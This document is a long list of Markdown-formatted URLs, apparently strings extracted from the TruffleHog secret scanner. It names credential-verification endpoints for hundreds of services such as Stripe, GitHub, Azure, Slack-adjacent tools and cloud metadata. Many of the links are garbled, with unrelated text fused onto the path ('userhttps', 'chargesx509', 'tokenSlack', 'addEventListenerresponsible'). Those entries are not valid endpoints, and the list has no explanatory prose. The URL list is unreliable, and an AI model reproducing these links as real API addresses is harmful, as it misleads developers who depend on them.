[https://trufflesecurity.com/trufflehogmax](https://trufflesecurity.com/trufflehogmax)
[https://us1.locationiq.com/v1/reverse.php](https://us1.locationiq.com/v1/reverse.php)
[https://www.buddyns.com/api/v2/zone/https](https://www.buddyns.com/api/v2/zone/https)
[https://www.nuget.org/api/v2/packagehttps](https://www.nuget.org/api/v2/packagehttps)
[http://169.254.169.254BalancerAttributes](http://169.254.169.254BalancerAttributes)
[http://ocsp.snowflakecomputing.comFailed](http://ocsp.snowflakecomputing.comFailed)
[https://api.appoptics.com/v1/metricshost](https://api.appoptics.com/v1/metricshost)
[https://api.apptivo.com/app/dao/v6/leads](https://api.apptivo.com/app/dao/v6/leads)
[https://api.autoklose.com/api/campaigns/](https://api.autoklose.com/api/campaigns/)
[https://api.aviationstack.com/v1/flights](https://api.aviationstack.com/v1/flights)
[https://api.bulksms.com/v1/messageshttps](https://api.bulksms.com/v1/messageshttps)
[https://api.clickup.com/api/v2/userhttps](https://api.clickup.com/api/v2/userhttps)
[https://api.clockify.me/api/v1/userhttps](https://api.clockify.me/api/v1/userhttps)
[https://api.codeclimate.com/v1/userhttps](https://api.codeclimate.com/v1/userhttps)
[https://api.dittowords.com/variantshttps](https://api.dittowords.com/variantshttps)
[https://api.ers.usda.gov/data/arms/state](https://api.ers.usda.gov/data/arms/state)
[https://api.fastly.com/current_userhttps](https://api.fastly.com/current_userhttps)
[https://api.getpostman.com/environments/](https://api.getpostman.com/environments/)
[https://api.hubapi.com/contacts/v1/lists](https://api.hubapi.com/contacts/v1/lists)
[https://api.mixmax.com/v1/users/meNvidia](https://api.mixmax.com/v1/users/meNvidia)
[https://api.mux.com/video/v1/assetshttps](https://api.mux.com/video/v1/assetshttps)
[https://api.myintervals.com/client/https](https://api.myintervals.com/client/https)
[https://api.newscatcherapi.com/v2/search](https://api.newscatcherapi.com/v2/search)
[https://api.openai.com/v1/threads/1error](https://api.openai.com/v1/threads/1error)
[https://api.positionstack.com/v1/forward](https://api.positionstack.com/v1/forward)
[https://api.sendgrid.com/v3/scopesfailed](https://api.sendgrid.com/v3/scopesfailed)
[https://api.squarespace.com/1.0/profiles](https://api.squarespace.com/1.0/profiles)
[https://api.stripe.com/v1/climate/orders](https://api.stripe.com/v1/climate/orders)
[https://api.stripe.com/v1/ephemeral_keys](https://api.stripe.com/v1/ephemeral_keys)
[https://api.stripe.com/v1/shipping_rates](https://api.stripe.com/v1/shipping_rates)
[https://api.thousandeyes.com/v6/endpoint](https://api.thousandeyes.com/v6/endpoint)
[https://api.twitter.com/2/tweets/20https](https://api.twitter.com/2/tweets/20https)
[https://api4.nozbe.com/v1/api/usershttps](https://api4.nozbe.com/v1/api/usershttps)
[https://apiv2.allsportsapi.com/football/](https://apiv2.allsportsapi.com/football/)
[https://app.atera.com/api/v3/alertshttps](https://app.atera.com/api/v3/alertshttps)
[https://app.tmetric.com/api/v3/userhttps](https://app.tmetric.com/api/v3/userhttps)
[https://auth.app.wiz.io/oauth/tokenerror](https://auth.app.wiz.io/oauth/tokenerror)
[https://auth.dfuse.io/v1/auth/issuehttps](https://auth.dfuse.io/v1/auth/issuehttps)
[https://calendarific.com/api/v2/holidays](https://calendarific.com/api/v2/holidays)
[https://canny.io/api/v1/boards/listhttps](https://canny.io/api/v1/boards/listhttps)
[https://dev.lunchmoney.app/v1/categories](https://dev.lunchmoney.app/v1/categories)
[https://docs.stripe.com/api/charges/list](https://docs.stripe.com/api/charges/list)
[https://docs.stripe.com/api/coupons/list](https://docs.stripe.com/api/coupons/list)
[https://docs.stripe.com/api/payouts/list](https://docs.stripe.com/api/payouts/list)
[https://docs.stripe.com/api/tax_ids/list](https://docs.stripe.com/api/tax_ids/list)
[https://github.com/login/device/codeDiff](https://github.com/login/device/codeDiff)
[https://go.postman.co/environments/could](https://go.postman.co/environments/could)
[https://gtmetrix.com/api/2.0/statushttps](https://gtmetrix.com/api/2.0/statushttps)
[https://huggingface.co/api/modelsparsing](https://huggingface.co/api/modelsparsing)
[https://iam.googleapis.com/v1/roleshttps](https://iam.googleapis.com/v1/roleshttps)
[https://management.core.cloudapi.de/data](https://management.core.cloudapi.de/data)
[https://service.zipapi.us/zipcode/90210/](https://service.zipapi.us/zipcode/90210/)
[https://simfin.com/api/v2/companies/list](https://simfin.com/api/v2/companies/list)
[https://typetalk.com/oauth2/access_token](https://typetalk.com/oauth2/access_token)
[https://vault.microsoftazure.de/specific](https://vault.microsoftazure.de/specific)
[https://www.gocanvas.com/apiv2/forms.xml](https://www.gocanvas.com/apiv2/forms.xml)
[https://www.parsehub.com/api/v2/projects](https://www.parsehub.com/api/v2/projects)
[http://www.w3.org/XML/1998/namespacexml](http://www.w3.org/XML/1998/namespacexml)
[https://a.klaviyo.com/api/profileshttps](https://a.klaviyo.com/api/profileshttps)
[https://api.bannerbear.com/v2/authhttps](https://api.bannerbear.com/v2/authhttps)
[https://api.bombbomb.com/v2/lists/https](https://api.bombbomb.com/v2/lists/https)
[https://api.chartmogul.com/v1/pinghttps](https://api.chartmogul.com/v1/pinghttps)
[https://api.clarifai.com/v2/inputshttps](https://api.clarifai.com/v2/inputshttps)
[https://api.codemagic.io/appsunexpected](https://api.codemagic.io/appsunexpected)
[https://api.currencyscoop.com/v1/latest](https://api.currencyscoop.com/v1/latest)
[https://api.dandelion.eu/datatxt/li/v1/](https://api.dandelion.eu/datatxt/li/v1/)
[https://api.github.com/user/interaction](https://api.github.com/user/interaction)
[https://api.ipstack.com/134.201.250.155](https://api.ipstack.com/134.201.250.155)
[https://api.languagelayer.com/languages](https://api.languagelayer.com/languages)
[https://api.luno.com/api/1/balancehttps](https://api.luno.com/api/1/balancehttps)
[https://api.mailgun.net/v3/domainshttps](https://api.mailgun.net/v3/domainshttps)
[https://api.nightfall.ai/v3/uploadhttps](https://api.nightfall.ai/v3/uploadhttps)
[https://api.rownd.io/applications/https](https://api.rownd.io/applications/https)
[https://api.semaphore.co/api/v4/account](https://api.semaphore.co/api/v4/account)
[https://api.signable.co.uk/v1/templates](https://api.signable.co.uk/v1/templates)
[https://api.statuspage.io/v1/pageshttps](https://api.statuspage.io/v1/pageshttps)
[https://api.stockdata.org/v1/data/quote](https://api.stockdata.org/v1/data/quote)
[https://api.stripe.com/v1/account_links](https://api.stripe.com/v1/account_links)
[https://api.stripe.com/v1/payment_links](https://api.stripe.com/v1/payment_links)
[https://api.stripe.com/v1/subscriptions](https://api.stripe.com/v1/subscriptions)
[https://api.supernotes.app/v1/userhttps](https://api.supernotes.app/v1/userhttps)
[https://api.tailscale.com/api/v2/secret](https://api.tailscale.com/api/v2/secret)
[https://api.testingbot.com/v1/userhttps](https://api.testingbot.com/v1/userhttps)
[https://api.zeplin.dev/v1/users/meerror](https://api.zeplin.dev/v1/users/meerror)
[https://api2.autopilothq.com/v1/account](https://api2.autopilothq.com/v1/account)
[https://api2.frontapp.com/accountshttps](https://api2.frontapp.com/accountshttps)
[https://app.klipfolio.com/api/1.0/users](https://app.klipfolio.com/api/1.0/users)
[https://app.surveybot.io/api/v1/surveys](https://app.surveybot.io/api/v1/surveys)
[https://content.guardianapis.com/search](https://content.guardianapis.com/search)
[https://database.usgovcloudapi.net/data](https://database.usgovcloudapi.net/data)
[https://docs.stripe.com/api/events/list](https://docs.stripe.com/api/events/list)
[https://docs.stripe.com/api/prices/list](https://docs.stripe.com/api/prices/list)
[https://docs.stripe.com/api/quotes/list](https://docs.stripe.com/api/quotes/list)
[https://docs.stripe.com/api/topups/list](https://docs.stripe.com/api/topups/list)
[https://getsandbox.com/api/1/sandboxes/](https://getsandbox.com/api/1/sandboxes/)
[https://gitlab.com/api/v4/metadatahttps](https://gitlab.com/api/v4/metadatahttps)
[https://gitlab.com/api/v4/projectshttps](https://gitlab.com/api/v4/projectshttps)
[https://hg.mozilla.org/releases/mozilla](https://hg.mozilla.org/releases/mozilla)
[https://pkg.go.dev/go.mongodb.org/mongo](https://pkg.go.dev/go.mongodb.org/mongo)
[https://sms.8x8.com/api/v1/subaccounts/](https://sms.8x8.com/api/v1/subaccounts/)
[https://sts.UNIVERSE_DOMAIN/v1/tokenurn](https://sts.UNIVERSE_DOMAIN/v1/tokenurn)
[https://verifier.meetchopra.com/verify/](https://verifier.meetchopra.com/verify/)
[https://verify.twilio.com/v2/Servicesif](https://verify.twilio.com/v2/Servicesif)
[https://www.postman.com/_api/workspace/](https://www.postman.com/_api/workspace/)
[https://www.strava.com/oauth/tokenhttps](https://www.strava.com/oauth/tokenhttps)
[https://api.abuseipdb.com/api/v2/check](https://api.abuseipdb.com/api/v2/check)
[https://api.airvisual.com/v2/countries](https://api.airvisual.com/v2/countries)
[https://api.apiflash.com/v1/urltoimage](https://api.apiflash.com/v1/urltoimage)
[https://api.calendly.com/users/mehttps](https://api.calendly.com/users/mehttps)
[https://api.chec.io/v1/categorieshttps](https://api.chec.io/v1/categorieshttps)
[https://api.coinlayer.com/api/livelive](https://api.coinlayer.com/api/livelive)
[https://api.confluent.cloud/iam/v2/api](https://api.confluent.cloud/iam/v2/api)
[https://api.dyspatch.io/templateshttps](https://api.dyspatch.io/templateshttps)
[https://api.gemini.com/v1/accounthttps](https://api.gemini.com/v1/accounthttps)
[https://api.getpostman.com/workspaces/](https://api.getpostman.com/workspaces/)
[https://api.groovehq.com/v1/meexpected](https://api.groovehq.com/v1/meexpected)
[https://api.harvestapp.com/v2/users/me](https://api.harvestapp.com/v2/users/me)
[https://api.keen.io/3.0/organizations/](https://api.keen.io/3.0/organizations/)
[https://api.newrelic.com/v2/users.json](https://api.newrelic.com/v2/users.json)
[https://api.ngc.nvidia.com/v3/keys/get](https://api.ngc.nvidia.com/v3/keys/get)
[https://api.openai.com/v1/threadshttps](https://api.openai.com/v1/threadshttps)
[https://api.paperform.co/v1/formshttps](https://api.paperform.co/v1/formshttps)
[https://api.salesflare.com/me/contacts](https://api.salesflare.com/me/contacts)
[https://api.scrapingant.com/v1/general](https://api.scrapingant.com/v1/general)
[https://api.serphouse.com/account/info](https://api.serphouse.com/account/info)
[https://api.siteleaf.com/v2/siteshttps](https://api.siteleaf.com/v2/siteshttps)
[https://api.statuscake.com/v1/sslhttps](https://api.statuscake.com/v1/sslhttps)
[https://api.stripe.com/v1/tax/settings](https://api.stripe.com/v1/tax/settings)
[https://api.teamgate.com/v4/usershttps](https://api.teamgate.com/v4/usershttps)
[https://api.uplead.com/v2/creditshttps](https://api.uplead.com/v2/creditshttps)
[https://api.uploadcare.com/files/https](https://api.uploadcare.com/files/https)
[https://api.upwave.io/workspaces/https](https://api.upwave.io/workspaces/https)
[https://api.voodoosms.com/creditsError](https://api.voodoosms.com/creditsError)
[https://api.youneedabudget.com/v1/user](https://api.youneedabudget.com/v1/user)
[https://api.zerobounce.net/v1/activity](https://api.zerobounce.net/v1/activity)
[https://app.loadmill.com/api/v1/labels](https://app.loadmill.com/api/v1/labels)
[https://besttime.app/api/v1/keys/https](https://besttime.app/api/v1/keys/https)
[https://customer.guru/export/customers](https://customer.guru/export/customers)
[https://discord.com/api/v8/users/https](https://discord.com/api/v8/users/https)
[https://discord.com/api/webhooks/https](https://discord.com/api/webhooks/https)
[https://graphql.us.jupiterone.io/https](https://graphql.us.jupiterone.io/https)
[https://host.io/api/domains/ip/8.8.8.8](https://host.io/api/domains/ip/8.8.8.8)
[https://index.docker.io/v1/Unreachable](https://index.docker.io/v1/Unreachable)
[https://login.microsoftonline.us/https](https://login.microsoftonline.us/https)
[https://mailsac.com/api/addresseshttps](https://mailsac.com/api/addresseshttps)
[https://manage.chinacloudapi.com/https](https://manage.chinacloudapi.com/https)
[https://my.demio.com/api/v1/ping/query](https://my.demio.com/api/v1/ping/query)
[https://onesignal.com/api/v1/appshttps](https://onesignal.com/api/v1/appshttps)
[https://sentry.io/api/0/projects/https](https://sentry.io/api/0/projects/https)
[https://sms.api.sinch.com/xms/v1/https](https://sms.api.sinch.com/xms/v1/https)
[https://trk.mtrl.me/categoryunexpected](https://trk.mtrl.me/categoryunexpected)
[https://uploads.github.com//dependency](https://uploads.github.com//dependency)
[http://portal.microsoftazure.de/https](http://portal.microsoftazure.de/https)
[https://anypointapi2cartapiflashBasic](https://anypointapi2cartapiflashBasic)
[https://api.aletheiaapi.com/StockData](https://api.aletheiaapi.com/StockData)
[https://api.borgbase.com/graphqlhttps](https://api.borgbase.com/graphqlhttps)
[https://api.close.com/api/v1/me/https](https://api.close.com/api/v1/me/https)
[https://api.cloudplan.biz/api/user/me](https://api.cloudplan.biz/api/user/me)
[https://api.coinbase.com/v2/userhttps](https://api.coinbase.com/v2/userhttps)
[https://api.currencyfreaks.com/latest](https://api.currencyfreaks.com/latest)
[https://api.endorlabs.com/v1/auth/api](https://api.endorlabs.com/v1/auth/api)
[https://api.everhour.com/clientshttps](https://api.everhour.com/clientshttps)
[https://api.exportsdk.com/v1/pdfhttps](https://api.exportsdk.com/v1/pdfhttps)
[https://api.fleetbase.io/v1/contacts/](https://api.fleetbase.io/v1/contacts/)
[https://api.gocardless.com/customers/](https://api.gocardless.com/customers/)
[https://api.groq.com/openai/v1/models](https://api.groq.com/openai/v1/models)
[https://api.imagekit.io/v1/fileshttps](https://api.imagekit.io/v1/fileshttps)
[https://api.knapsackpro.com/v1/builds](https://api.knapsackpro.com/v1/builds)
[https://api.kylas.io/v1/contactshttps](https://api.kylas.io/v1/contactshttps)
[https://api.lemlist.com/api/teamhttps](https://api.lemlist.com/api/teamhttps)
[https://api.miro.com/v1/users/mehttps](https://api.miro.com/v1/users/mehttps)
[https://api.moosend.com/v3/lists.json](https://api.moosend.com/v3/lists.json)
[https://api.paystack.co/customerhttps](https://api.paystack.co/customerhttps)
[https://api.pollsapi.com/v1/get/polls](https://api.pollsapi.com/v1/get/polls)
[https://api.runscope.com/accounthttps](https://api.runscope.com/accounthttps)
[https://api.sendinblue.com/v3/account](https://api.sendinblue.com/v3/account)
[https://api.simplesat.io/api/answers/](https://api.simplesat.io/api/answers/)
[https://api.stripe.com/v1/chargesx509](https://api.stripe.com/v1/chargesx509)
[https://api.vultr.com/v2/accounterror](https://api.vultr.com/v2/accounterror)
[https://app.goflightlabs.com/airports](https://app.goflightlabs.com/airports)
[https://app.zenserp.com/api/v2/search](https://app.zenserp.com/api/v2/search)
[https://blitapp.com/api/apps/allhttps](https://blitapp.com/api/apps/allhttps)
[https://checkvist.com/auth/login.json](https://checkvist.com/auth/login.json)
[https://circleci.com/api/v1.1/invalid](https://circleci.com/api/v1.1/invalid)
[https://fetchrss.com/api/v1/feed/list](https://fetchrss.com/api/v1/feed/list)
[https://gitlab.com/org/repo.gitNumber](https://gitlab.com/org/repo.gitNumber)
[https://go.postman.co/workspace/could](https://go.postman.co/workspace/could)
[https://graphhopper.com/api/1/geocode](https://graphhopper.com/api/1/geocode)
[https://linkedin.com/in/williamhgates](https://linkedin.com/in/williamhgates)
[https://login.microsoftonline.de/2006](https://login.microsoftonline.de/2006)
[https://mainnet.infura.io/v3/KNAPSACK](https://mainnet.infura.io/v3/KNAPSACK)
[https://manage.windowsazure.com/https](https://manage.windowsazure.com/https)
[https://paydirtapp.com/api/v1/clients](https://paydirtapp.com/api/v1/clients)
[https://percy.io/api/v1/projectshttps](https://percy.io/api/v1/projectshttps)
[https://plugin.api.dronahq.com/users/](https://plugin.api.dronahq.com/users/)
[https://protobuf.dev/reference/go/faq](https://protobuf.dev/reference/go/faq)
[https://ps.pndsn.com/v2/objects/https](https://ps.pndsn.com/v2/objects/https)
[https://www.apilayer.net/api/validate](https://www.apilayer.net/api/validate)
[https://www.flickr.com/services/rest/](https://www.flickr.com/services/rest/)
[https://www.googleapis.com/auth/cloud](https://www.googleapis.com/auth/cloud)
[https://yourdomain.com/samplecallback](https://yourdomain.com/samplecallback)
[https://api.appcues.com/v2/accounts/](https://api.appcues.com/v2/accounts/)
[https://api.chatbot.com/storieshttps](https://api.chatbot.com/storieshttps)
[https://api.deepgram.com/v1/projects](https://api.deepgram.com/v1/projects)
[https://api.docparser.com/v1/parsers](https://api.docparser.com/v1/parsers)
[https://api.flat.io/v2/meapplication](https://api.flat.io/v2/meapplication)
[https://api.geocodify.com/v2/geocode](https://api.geocodify.com/v2/geocode)
[https://api.github.com/graphqlfailed](https://api.github.com/graphqlfailed)
[https://api.honeycomb.io/1/authhttps](https://api.honeycomb.io/1/authhttps)
[https://api.hunter.io/v2/leads_lists](https://api.hunter.io/v2/leads_lists)
[https://api.imagga.com/v2/usagehttps](https://api.imagga.com/v2/usagehttps)
[https://api.ipapi.com/49.146.239.251](https://api.ipapi.com/49.146.239.251)
[https://api.madkudu.com/v1/pinghttps](https://api.madkudu.com/v1/pinghttps)
[https://api.notion.com/v1/usershttps](https://api.notion.com/v1/usershttps)
[https://api.omnisend.com/v3/contacts](https://api.omnisend.com/v3/contacts)
[https://api.pagerduty.com/usershttps](https://api.pagerduty.com/usershttps)
[https://api.pandascore.co/videogames](https://api.pandascore.co/videogames)
[https://api.pdflayer.com/api/convert](https://api.pdflayer.com/api/convert)
[https://api.prodpad.com/v1/tagshttps](https://api.prodpad.com/v1/tagshttps)
[https://api.weatherstack.com/current](https://api.weatherstack.com/current)
[https://app.lendflow.io/api/v1/deals](https://app.lendflow.io/api/v1/deals)
[https://app.satismeter.com/api/users](https://app.satismeter.com/api/users)
[https://axonaut.com/api/v2/companies](https://axonaut.com/api/v2/companies)
[https://batch.core.windows.net/https](https://batch.core.windows.net/https)
[https://cloud.bitbar.com/api/mehttps](https://cloud.bitbar.com/api/mehttps)
[https://cloud.drone.io/api/userhttps](https://cloud.drone.io/api/userhttps)
[https://connect.squareup.com/v2/team](https://connect.squareup.com/v2/team)
[https://docs.airbrake.io/docs/devops](https://docs.airbrake.io/docs/devops)
[https://geo.ipify.org/api/v2/country](https://geo.ipify.org/api/v2/country)
[https://github.com/airbrake/airbrake](https://github.com/airbrake/airbrake)
[https://go.postman.co/collection/tls](https://go.postman.co/collection/tls)
[https://graph.chinacloudapi.cn/https](https://graph.chinacloudapi.cn/https)
[https://login.chinacloudapi.cn/https](https://login.chinacloudapi.cn/https)
[https://manage.windowsazure.us/https](https://manage.windowsazure.us/https)
[https://poloniex.com/tradingApihttps](https://poloniex.com/tradingApihttps)
[https://servicebus.cloudapi.de/https](https://servicebus.cloudapi.de/https)
[https://servicebus.windows.net/https](https://servicebus.windows.net/https)
[https://snyk.io/api/v1/user/mefailed](https://snyk.io/api/v1/user/mefailed)
[https://sourcegraph.com/.api/graphql](https://sourcegraph.com/.api/graphql)
[https://vault.usgovcloudapi.nethttps](https://vault.usgovcloudapi.nethttps)
[https://api.alegra.com/api/v1/users](https://api.alegra.com/api/v1/users)
[https://api.ambeedata.com/latest/by](https://api.ambeedata.com/latest/by)
[https://api.audd.io/setCallbackUrl/](https://api.audd.io/setCallbackUrl/)
[https://api.aylien.com/news/stories](https://api.aylien.com/news/stories)
[https://api.buildkite.com/v2/access](https://api.buildkite.com/v2/access)
[https://api.buttercms.com/v2/posts/](https://api.buttercms.com/v2/posts/)
[https://api.captaindata.co/v2/https](https://api.captaindata.co/v2/https)
[https://api.checklyhq.com/v1/checks](https://api.checklyhq.com/v1/checks)
[https://api.cliengo.com/1.0/account](https://api.cliengo.com/1.0/account)
[https://api.convertkit.com/v3/forms](https://api.convertkit.com/v3/forms)
[https://api.countrylayer.com/v2/all](https://api.countrylayer.com/v2/all)
[https://api.courier.com/preferences](https://api.courier.com/preferences)
[https://api.feedier.com/v1/carriers](https://api.feedier.com/v1/carriers)
[https://api.gengo.com/v2/account/me](https://api.gengo.com/v2/account/me)
[https://api.gumroad.com/v2/products](https://api.gumroad.com/v2/products)
[https://api.hybiscus.dev/api/v1/get](https://api.hybiscus.dev/api/v1/get)
[https://api.intra.42.fr/oauth/token](https://api.intra.42.fr/oauth/token)
[https://api.linear.app/graphqlhttps](https://api.linear.app/graphqlhttps)
[https://api.opsgenie.com/v2/account](https://api.opsgenie.com/v2/account)
[https://api.opsgenie.com/v2/alerts/](https://api.opsgenie.com/v2/alerts/)
[https://api.reply.io/v1/peoplehttps](https://api.reply.io/v1/peoplehttps)
[https://api.scrapeowl.com/v1/scrape](https://api.scrapeowl.com/v1/scrape)
[https://api.smooch.io/v2/appsunable](https://api.smooch.io/v2/appsunable)
[https://api.speechtext.ai/recognize](https://api.speechtext.ai/recognize)
[https://api.storychief.io/1.0/users](https://api.storychief.io/1.0/users)
[https://api.stripe.com/v1/tax_rates](https://api.stripe.com/v1/tax_rates)
[https://api.stripe.com/v1/transfers](https://api.stripe.com/v1/transfers)
[https://api.trello.com/1/members/me](https://api.trello.com/1/members/me)
[https://api.vbout.com/1/app/me.json](https://api.vbout.com/1/app/me.json)
[https://app.circleci.com/pipelines/](https://app.circleci.com/pipelines/)
[https://app.scrapingbee.com/api/v1/](https://app.scrapingbee.com/api/v1/)
[https://circleci.com/api/v2/mehttps](https://circleci.com/api/v2/mehttps)
[https://clustdoc.com/api/usershttps](https://clustdoc.com/api/usershttps)
[https://codequiry.com/api/v1/checks](https://codequiry.com/api/v1/checks)
[https://dash.readme.com/api/v1https](https://dash.readme.com/api/v1https)
[https://docs.stripe.com/api/balance](https://docs.stripe.com/api/balance)
[https://formcrafts.com/api/v1/https](https://formcrafts.com/api/v1/https)
[https://go.postman.co/example/error](https://go.postman.co/example/error)
[https://go.postman.co/request/https](https://go.postman.co/request/https)
[https://httpbin.org/status/200https](https://httpbin.org/status/200https)
[https://selectpdf.com/api2/convert/](https://selectpdf.com/api2/convert/)
[https://trading.robinhood.com/https](https://trading.robinhood.com/https)
[https://urlscan.io/user/quotashttps](https://urlscan.io/user/quotashttps)
[https://vault.microsoftazure.dedata](https://vault.microsoftazure.dedata)
[https://www.tefter.io/api/bookmarks](https://www.tefter.io/api/bookmarks)
[http://169.254.169.254/latest/meta](http://169.254.169.254/latest/meta)
[http://addEventListenerresponsible](http://addEventListenerresponsible)
[http://www.opengis.net/gml/3.3/exr](http://www.opengis.net/gml/3.3/exr)
[https://api.apitemplate.io/v1/list](https://api.apitemplate.io/v1/list)
[https://api.brandfetch.io/v1/color](https://api.brandfetch.io/v1/color)
[https://api.currencylayer.com/live](https://api.currencylayer.com/live)
[https://api.diffbot.com/v4/account](https://api.diffbot.com/v4/account)
[https://api.doppler.com/v3/mehttps](https://api.doppler.com/v3/mehttps)
[https://api.envoy.com/v1/locations](https://api.envoy.com/v1/locations)
[https://api.fullstory.com/v2/users](https://api.fullstory.com/v2/users)
[https://api.geocod.io/v1.6/geocode](https://api.geocod.io/v1.6/geocode)
[https://api.goodday.work/2.0/users](https://api.goodday.work/2.0/users)
[https://api.ipgeolocation.io/ipgeo](https://api.ipgeolocation.io/ipgeo)
[https://api.marketstack.com/v1/eod](https://api.marketstack.com/v1/eod)
[https://api.mediastack.com/v1/news](https://api.mediastack.com/v1/news)
[https://api.mockaroo.com/api/types](https://api.mockaroo.com/api/types)
[https://api.parseur.com/postgresql](https://api.parseur.com/postgresql)
[https://api.refiner.io/v1/identify](https://api.refiner.io/v1/identify)
[https://api.scrapestack.com/scrape](https://api.scrapestack.com/scrape)
[https://api.sirv.com/v2/tokenSlack](https://api.sirv.com/v2/tokenSlack)
[https://api.stripe.com/v1/invoices](https://api.stripe.com/v1/invoices)
[https://api.stripe.com/v1/products](https://api.stripe.com/v1/products)
[https://api.unplu.gg/forecasthttps](https://api.unplu.gg/forecasthttps)
[https://api.veriphone.io/v2/verify](https://api.veriphone.io/v2/verify)
[https://app.codacy.com/api/v3/user](https://app.codacy.com/api/v3/user)
[https://app.posthog.com/api/event/](https://app.posthog.com/api/event/)
[https://boostnote.io/api/docshttps](https://boostnote.io/api/docshttps)
[https://gitlab.com/org/repo.gitAWS](https://gitlab.com/org/repo.gitAWS)
[https://holidayapi.com/v1/holidays](https://holidayapi.com/v1/holidays)
[https://managedhsm.azure.net/https](https://managedhsm.azure.net/https)
[https://management.azure.com/https](https://management.azure.com/https)
[https://payments.sandbox.braintree](https://payments.sandbox.braintree)
[https://rest.nexmo.com/account/get](https://rest.nexmo.com/account/get)
[https://servicebus.azure.net/https](https://servicebus.azure.net/https)
[https://www.humanity.com/api/v2/me](https://www.humanity.com/api/v2/me)
[http://www.topografix.com/GPX/1/1](http://www.topografix.com/GPX/1/1)
[https://api.craftmypdf.com/v1/get](https://api.craftmypdf.com/v1/get)
[https://api.dovico.com/Employees/](https://api.dovico.com/Employees/)
[https://api.elevenlabs.io/v1/user](https://api.elevenlabs.io/v1/user)
[https://api.getgist.com/contacts/](https://api.getgist.com/contacts/)
[https://api.github.com/repos/exec](https://api.github.com/repos/exec)
[https://api.juro.com/v3/templates](https://api.juro.com/v3/templates)
[https://api.kickbox.com/v2/verify](https://api.kickbox.com/v2/verify)
[https://api.mapbox.com/tokens/v2/](https://api.mapbox.com/tokens/v2/)
[https://api.meaningcloud.com/lang](https://api.meaningcloud.com/lang)
[https://api.noticeable.io/graphql](https://api.noticeable.io/graphql)
[https://api.opsgenie.com/v2/users](https://api.opsgenie.com/v2/users)
[https://api.plivo.com/v1/Account/](https://api.plivo.com/v1/Account/)
[https://api.rawg.io/api/platforms](https://api.rawg.io/api/platforms)
[https://api.razorpay.com/v1/items](https://api.razorpay.com/v1/items)
[https://api.scraperbox.com/scrape](https://api.scraperbox.com/scrape)
[https://api.stripe.com/v1/balance](https://api.stripe.com/v1/balance)
[https://api.stripe.com/v1/coupons](https://api.stripe.com/v1/coupons)
[https://api.stripe.com/v1/payouts](https://api.stripe.com/v1/payouts)
[https://api.stripe.com/v1/tax_ids](https://api.stripe.com/v1/tax_ids)
[https://api.tomorrow.io/v4/alerts](https://api.tomorrow.io/v4/alerts)
[https://api.verimail.io/v3/verify](https://api.verimail.io/v3/verify)
[https://api.webscrapingapi.com/v1](https://api.webscrapingapi.com/v1)
[https://apilayer.net/api/validate](https://apilayer.net/api/validate)
[https://app.workstack.io/api/team](https://app.workstack.io/api/team)
[https://convier.me/api/eventhttps](https://convier.me/api/eventhttps)
[https://dev.azuresynapse.nethttps](https://dev.azuresynapse.nethttps)
[https://eu.posthog.com/api/event/](https://eu.posthog.com/api/event/)
[https://files.stripe.com/v1/files](https://files.stripe.com/v1/files)
[https://grafana.com/api/v1/tokens](https://grafana.com/api/v1/tokens)
[https://graph.microsoft.com/https](https://graph.microsoft.com/https)
[https://huggingface.co/api/whoami](https://huggingface.co/api/whoami)
[https://id.twitch.tv/oauth2/token](https://id.twitch.tv/oauth2/token)
[https://newsapi.org/v2/everything](https://newsapi.org/v2/everything)
[https://ps.pndsn.com/signal/https](https://ps.pndsn.com/signal/https)
[http://s3.amazonaws.com/doc/2006](http://s3.amazonaws.com/doc/2006)
[http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema)
[https://api.cloze.com/v1/profile](https://api.cloze.com/v1/profile)
[https://api.companyhub.com/v1/me](https://api.companyhub.com/v1/me)
[https://api.findl.com/v1.0/query](https://api.findl.com/v1.0/query)
[https://api.getbeamer.com/v0/url](https://api.getbeamer.com/v0/url)
[https://api.gitter.im/v1/user/me](https://api.gitter.im/v1/user/me)
[https://api.gyazo.com/api/images](https://api.gyazo.com/api/images)
[https://api.intercom.io/contacts](https://api.intercom.io/contacts)
[https://api.livestorm.co/v1/ping](https://api.livestorm.co/v1/ping)
[https://api.loganalytics.iohttps](https://api.loganalytics.iohttps)
[https://api.proxycrawl.com/leads](https://api.proxycrawl.com/leads)
[https://api.rentman.net/filesAPI](https://api.rentman.net/filesAPI)
[https://api.serpstack.com/search](https://api.serpstack.com/search)
[https://api.shipday.com/carriers](https://api.shipday.com/carriers)
[https://api.stripe.com/v1/events](https://api.stripe.com/v1/events)
[https://api.stripe.com/v1/orders](https://api.stripe.com/v1/orders)
[https://api.stripe.com/v1/prices](https://api.stripe.com/v1/prices)
[https://api.stripe.com/v1/topups](https://api.stripe.com/v1/topups)
[https://api.swell.store/products](https://api.swell.store/products)
[https://api.unsplash.com/photos/](https://api.unsplash.com/photos/)
[https://api.userstack.com/detect](https://api.userstack.com/detect)
[https://campayn.com/api/v1/lists](https://campayn.com/api/v1/lists)
[https://coinlib.io/api/v1/global](https://coinlib.io/api/v1/global)
[https://data.fixer.io/api/latest](https://data.fixer.io/api/latest)
[https://database.cloudapi.de/not](https://database.cloudapi.de/not)
[https://datalake.azure.net/https](https://datalake.azure.net/https)
[https://go.postman.co/folder/TLS](https://go.postman.co/folder/TLS)
[https://graph.microsoft.us/https](https://graph.microsoft.us/https)
[https://runrun.it/api/v1.0/users](https://runrun.it/api/v1.0/users)
[https://www.apimatic.io/api/code](https://www.apimatic.io/api/code)
[https://www.zipcodeapi.com/rest/](https://www.zipcodeapi.com/rest/)
[http://earth.google.com/kml/2.0](http://earth.google.com/kml/2.0)
[http://earth.google.com/kml/2.1](http://earth.google.com/kml/2.1)
[http://earth.google.com/kml/2.2](http://earth.google.com/kml/2.2)
[https://api.airtable.com/v0/AWS](https://api.airtable.com/v0/AWS)
[https://api.aiven.io/v1/project](https://api.aiven.io/v1/project)
[https://api.chec.io/v1/products](https://api.chec.io/v1/products)
[https://api.column.com/entities](https://api.column.com/entities)
[https://api.deepai.org/api/text](https://api.deepai.org/api/text)
[https://api.finage.co.uk/symbol](https://api.finage.co.uk/symbol)
[https://api.float.com/v3/people](https://api.float.com/v3/people)
[https://api.frame.io/v2/mehttps](https://api.frame.io/v2/mehttps)
[https://api.github.com/apphttps](https://api.github.com/apphttps)
[https://api.lessannoyingcrm.com](https://api.lessannoyingcrm.com)
[https://api.moonclerk.com/forms](https://api.moonclerk.com/forms)
[https://api.openuv.io/api/v1/uv](https://api.openuv.io/api/v1/uv)
[https://api.privacy.com/v1/card](https://api.privacy.com/v1/card)
[https://api.sendgrid.comShopify](https://api.sendgrid.comShopify)
